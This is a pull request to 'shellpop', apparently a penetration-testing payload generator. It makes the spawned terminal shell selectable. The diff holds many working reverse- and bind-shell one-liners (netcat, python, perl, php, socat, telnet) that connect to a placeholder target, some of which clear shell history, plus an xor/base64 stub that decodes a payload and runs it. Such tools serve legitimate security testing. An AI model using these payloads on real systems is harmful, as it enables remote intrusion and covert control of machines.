### PR TITLE
Complete shell selection

### DIFF
--- a/bin/shellpop
+++ b/bin/shellpop
@@ -578,8 +578,8 @@ def main():
     parser.add_argument("-H", "--host", type=str, help="IP to be used in connectback (reverse) shells.")
     parser.add_argument("-P", "--port", type=int, help="Port to be used in reverse/bind shell code.")
     parser.add_argument("--number", type=int, help="Shell code index number", required=False)
-    parser.add_argument("--shell", type=str, default="/bin/sh",
-                        help="Terminal shell to be used if the payload spawns one. '/bin/sh' is used by defult.", required=False)
+    parser.add_argument("--shell", type=str, default="/bin/bash",
+                        help="Terminal shell to be used by payloads and decoding stubs. '/bin/bash' is used by defult.", required=False)
 
     # Shell Type
     payload_arg = parser.add_argument_group('Shell Types')

--- a/bin/shellpop
+++ b/bin/shellpop
@@ -578,8 +578,8 @@ def main():
     parser.add_argument("-H", "--host", type=str, help="IP to be used in connectback (reverse) shells.")
     parser.add_argument("-P", "--port", type=int, help="Port to be used in reverse/bind shell code.")
     parser.add_argument("--number", type=int, help="Shell code index number", required=False)
-    parser.add_argument("--shell", type=str, default="",
-                        help="Terminal shell to be used when decoding some encoding scheme.", required=False)
+    parser.add_argument("--shell", type=str, default="/bin/sh",
+                        help="Terminal shell to be used if the payload spawns one. '/bin/sh' is used by defult.", required=False)
 
     # Shell Type
     payload_arg = parser.add_argument_group('Shell Types')
@@ -660,6 +660,9 @@ def main():
         write(header())
         print(error("Error: You can't select both --reverse and --bind options."))
         exit(1)
+
+    if args.shell not in ["/bin/bash", "/bin/dash", "/bin/fish", "/bin/ksh", "/bin/sh", "/bin/tcsh", "/bin/zsh"]:
+        print(alert("'{0}' is not a common UNIX shell, your payload may not work correctly...".format(args.shell)))
 
     if args.host in [str(x) for x in netifaces.interfaces()]:
         args.host = str(netifaces.ifaddresses(args.host)[2][0]["addr"])  # translate iface name to ipv4

--- a/src/bind.py
+++ b/src/bind.py
@@ -3,7 +3,7 @@
 # Bind TCP shells
 
 def BIND_PYTHON_TCP():
-    return """python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(('',PORT));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);p=subprocess.call(['/bin/bash','-i'])" """
+    return """python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(('',PORT));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);p=subprocess.call(['SHELL','-i'])" """
 
 
 def BIND_PYTHON_UDP():
@@ -11,7 +11,7 @@ def BIND_PYTHON_UDP():
 
 
 def BIND_PERL_TCP():
-    return """perl -e 'use Socket;$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'"""
+    return """perl -e 'use Socket;$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("SHELL -i");};'"""
 
 
 def BIND_PERL_UDP():
@@ -27,7 +27,7 @@ def BIND_PHP_UDP():
 
 
 def BIND_RUBY_TCP():
-    return """ruby -rsocket -e 'f=TCPServer.new(PORT);s=f.accept;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",s,s,s)'"""
+    return """ruby -rsocket -e 'f=TCPServer.new(PORT);s=f.accept;exec sprintf("SHELL -i <&%d >&%d 2>&%d",s,s,s)'"""
 
 
 def BIND_RUBY_UDP():
@@ -35,15 +35,15 @@ def BIND_RUBY_UDP():
 
 
 def BIND_NETCAT_TCP():
-    return """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lvp PORT >/tmp/f"""
+    return """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|SHELL -i 2>&1|nc -lvp PORT >/tmp/f"""
 
 
 def BIND_NETCAT_TRADITIONAL_TCP():
-    return """nc -lvp PORT -c /bin/bash"""
+    return """nc -lvp PORT -c SHELL"""
 
 
 def BIND_NETCAT_OPENBSD_UDP():
-    return """coproc nc -luvp PORT; exec /bin/bash <&0${COPROC[0]} >&${COPROC[1]} 2>&1"""
+    return """coproc nc -luvp PORT; exec SHELL <&0${COPROC[0]} >&${COPROC[1]} 2>&1"""
 
 
 def BIND_POWERSHELL_TCP():

--- a/src/bind.py
+++ b/src/bind.py
@@ -59,7 +59,7 @@ def BIND_AWK_TCP():
 # Removed from MetasploitFramework
 # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/bind_socat_udp.rb
 def BIND_SOCAT_UDP():
-    return "socat udp-listen:PORT exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+    return "socat udp-listen:PORT exec:'SHELL -li',pty,stderr,sane 2>&1>/dev/null &"
 
 
 def BIND_POWERSHELL_NISHANG_TCP():

--- a/src/classes.py
+++ b/src/classes.py
@@ -82,9 +82,9 @@ def powershell_wrapper(name, code, args):
     return code
 
 
-def xor_wrapper(name, code, args, shell="/bin/bash"):
-    if args.shell is not "":
-        shell = args.shell
+def xor_wrapper(name, code, args):
+    shell = args.shell
+
     if "powershell" not in name.lower():
         if "windows" not in name.lower():
             code = """s="";for x in $(echo {0}|sed "s/../&\\n/g"); do s=$s$(echo -e $(awk "BEGIN {{printf \\"%x\\n\\", xor(0x$x, {1})}}"|sed "s/../\\\\\\\\x&/g"));done;echo $s|{2}""".format(hexlify(xor(code, args.xor)), hex(args.xor), shell)
@@ -107,9 +107,9 @@ def xor_wrapper(name, code, args, shell="/bin/bash"):
     return code
 
 
-def base64_wrapper(name, code, args, shell="/bin/bash"):
-    if args.shell is not "":
-        shell = args.shell
+def base64_wrapper(name, code, args):
+    shell = args.shell
+
     if args.base64 is True:
         if "powershell" not in name.lower(): # post-note: linux powershell is going to have problem.
             if "windows" not in name.lower():
@@ -214,6 +214,9 @@ class ReverseShell(object):
                 print(error("No custom shell procedure was arranged for this shell. This is fatal."))
                 exit(1)
         
+        # Set the terminal shell used
+        self.code = self.code.replace("SHELL", self.args.shell)
+
         # Apply xor encoding.
         self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)
 
@@ -242,6 +245,9 @@ class BindShell(object):
         """
         # Set connection data to the code.
         self.code = self.code.replace("PORT", str(self.port))
+
+        # Set the terminal shell used
+        self.code = self.code.replace("SHELL", self.args.shell)
 
         # Apply powershell-tuning if set in args.
         self.code = powershell_wrapper(self.name, self.code, self.args)

--- a/src/reverse.py
+++ b/src/reverse.py
@@ -52,7 +52,7 @@ def REVERSE_NC_TRADITIONAL_1():
 
 
 def REVERSE_NC_UDP_1():
-    return """mkfifo fifo ; nc.traditional -u TARGET PORT < fifo | { bash -i; } > fifo"""
+    return """mkfifo fifo ; nc.traditional -u TARGET PORT < fifo | { SHELL -i; } > fifo"""
 
 
 def REVERSE_MKFIFO_NC():
@@ -72,7 +72,7 @@ def REVERSE_MKNOD_TELNET():
 
 
 def REVERSE_SOCAT():
-    return """socat tcp-connect:TARGET:PORT exec:"bash -li",pty,stderr,setsid,sigint,sane"""
+    return """socat tcp-connect:TARGET:PORT exec:"SHELL -li",pty,stderr,setsid,sigint,sane"""
 
 
 def REVERSE_AWK():

--- a/src/reverse.py
+++ b/src/reverse.py
@@ -4,15 +4,15 @@ from classes import generate_file_name
 
 
 def REV_PYTHON_TCP():
-    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """
+    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('SHELL'); s.close();\" """
 
 
 def REV_PYTHON_UDP():
-    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """
+    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('SHELL'); s.close();\" """
 
 
 def REV_PHP_TCP():
-    return r"""php -r "\$sock=fsockopen('TARGET',PORT);exec('/bin/sh -i <&3 >&3 2>&3');" """
+    return r"""php -r "\$sock=fsockopen('TARGET',PORT);exec('SHELL -i <&3 >&3 2>&3');" """
 
 
 def REV_RUBY_TCP():
@@ -20,7 +20,7 @@ def REV_RUBY_TCP():
 
 
 def REV_PERL_TCP():
-    return r"""perl -e "use Socket;\$i='TARGET';\$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" """
+    return r"""perl -e "use Socket;\$i='TARGET';\$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('SHELL -i');};" """
 
 
 def REV_PERL_TCP_2():
@@ -44,11 +44,11 @@ def REVERSE_TCLSH():
 
 
 def REVERSE_NCAT():
-    return "ncat TARGET PORT -e /bin/bash"
+    return "ncat TARGET PORT -e SHELL"
 
 
 def REVERSE_NC_TRADITIONAL_1():
-    return "nc TARGET PORT -c /bin/bash"
+    return "nc TARGET PORT -c SHELL"
 
 
 def REVERSE_NC_UDP_1():
@@ -56,19 +56,19 @@ def REVERSE_NC_UDP_1():
 
 
 def REVERSE_MKFIFO_NC():
-    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TARGET PORT > /tmp/f"
+    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|SHELL -i 2>&1|nc TARGET PORT > /tmp/f"
 
 
 def REVERSE_MKNOD_NC():
-    return "if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc TARGET PORT 0</tmp/f|/bin/bash 1>/tmp/f"
+    return "if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc TARGET PORT 0</tmp/f|SHELL 1>/tmp/f"
 
 
 def REVERSE_MKFIFO_TELNET():
-    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet TARGET PORT > /tmp/f"
+    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|SHELL -i 2>&1|telnet TARGET PORT > /tmp/f"
 
 
 def REVERSE_MKNOD_TELNET():
-    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mknod /tmp/f p && telnet TARGET PORT 0</tmp/f|/bin/bash 1>/tmp/f"
+    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mknod /tmp/f p && telnet TARGET PORT 0</tmp/f|SHELL 1>/tmp/f"
 
 
 def REVERSE_SOCAT():


### PR DESCRIPTION
This allows users to pick what terminal shell is used if the reverse or bind shell they chose executes a terminal shell directly. This could be useful if `/bin/bash` isn't available. I made `/bin/sh` the default shell for portability.

 This is just a starting point, I realize there may be some bind or reverse payloads that will fail when `/bin/bash` is not used, or only work on certain shells. I have tested some, but wanted to make a PR so we could discuss changes. 

If there are many payloads that require executing a certain terminal shell/certain set of terminal shells to run successfully, maybe I can add a variable to the Shell class that contains the shells the payload is know to work against? Just an idea.  